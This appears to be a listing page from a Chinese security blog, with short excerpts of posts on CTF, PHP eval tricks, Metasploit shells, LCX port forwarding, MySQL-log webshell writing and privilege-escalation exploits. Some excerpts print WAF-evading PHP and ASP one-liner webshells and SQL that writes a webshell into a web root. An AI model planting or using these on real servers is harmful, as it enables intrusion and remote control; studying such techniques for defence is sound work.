DYBOY's Blog
网络安全
第十一届全国大学生信息安全竞赛(西南赛区)WriteUp分析

博主是个CTF小菜,也是第一次跟着大佬去参加线下比赛,收获颇丰,因为菜,只能记录部分,后面再等大佬的WriteUp吧~小东参加的是西南赛区的比赛,大佬是真的有,不过题目也是真的怪(我菜),基本是WEB方向的题,类似于杂项,脑洞也是出奇的大,有的题目还是值得学习,后面等搭建好docker环境在做尝试。0x00彩蛋题主办方说做了这道题会有i春秋的神秘礼物一份,因此小东做了一下,过程也是极...

网络安全
PHP之伪协议深入理解

了解一门语言必须得了解其基础,之前做渗透测试,就是xjb测试,还以为自己要上天了,沉下心来,一个萝卜一个坑,加油吧,骚年~今天晚上,听了漏洞银行的大咖公开课讲的内网渗透,感觉和大咖之间还有不少差距,不过搞到了一波工具,心里依然美滋滋~//文件读取相关函数include、require、include_once、require_once、highlight_file、show_so...

网络安全
PHP复杂变量绕过addslashes()直接拿shell

很早的时候,渗透吧群里的朋友提出的一个问题,自己也是迷迷糊糊,遂记之如下!0x00示例ctf.php<?php@$_str=$_GET['str'];//print_r($_str);$_temp='$str="'.addslashes($_str).'";';@print_r($_temp);@eval('$st...

网络安全
[笔记]Metasploit内网/局域网劫持

Metasploit内网劫持的笔记内网渗透劫持DNS拿到cmdshell,如下步骤:ifconfig//获取IP及网卡信息leafpad/etc/ettercap/etter.dns//打开文件插入*A记录预设IPserviceapache2start//启动本机apache服务此次不用启动,使用ms10_046会自动启动//*A...

网络安全
[笔记]MetaSploit之弹个shell

在学习KaliLinux渗透时候记录的Metasploit使用笔记0x00简介Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。0x01reverse_tcp反弹shellsunnyclientid隧道id即可启动服务生成反弹shellmsfvenom...

网络安全
[内网渗透]LCX的蒂花之秀

LCX弹个shellLCX端口转发(突破内网不能连接)Webshell执行-slave<ConnectHost><ConnectPort><TransmitHost><TransPort>-slave外网IP外网IP监听端口127.0.0.1远程桌面端口外网(服务器)执行-listen...

网络安全
[笔记]PHP过狗一句话

四处搜刮,风雨飘摇<?php$a=$_GET['a'];$b=$_GET['b'];$c=base64_decode($a).base64_decode($b);$c=$_REQUEST['cmd'];?>

网络安全
[笔记]Mysql通过日志拿shell

Mysql通过日志拿shellemmm~有点舒服0x00利用条件root网站物理路径文件位置未被限制0x01SQL语句setglobalgeneral_log=on;setglobalgeneral_log_file='C:/phpStudy/WWW/dyboy.php';select'<?php@assert($_POST...

网络安全
[笔记]ASP过狗一句话

ASP过狗一句话<%dimx1,x2x1=request("pass")x2=x1evalx2%>

网络安全
[笔记]渗透测试提权EXP一览表

避免忘记,记录提权EXP对应表,便于快速提权0x00Windows#SecurityBulletin#KB#Description#OperatingSystemCVE-2017-0213 [WindowsCOMElevationofPrivilegeVulnerability]  (windows10/8.1/7/2016/2010/2...

TOP
Powered by Emlog | Theme:Monkey by DYBOY
渝ICP备16008772号
sitemap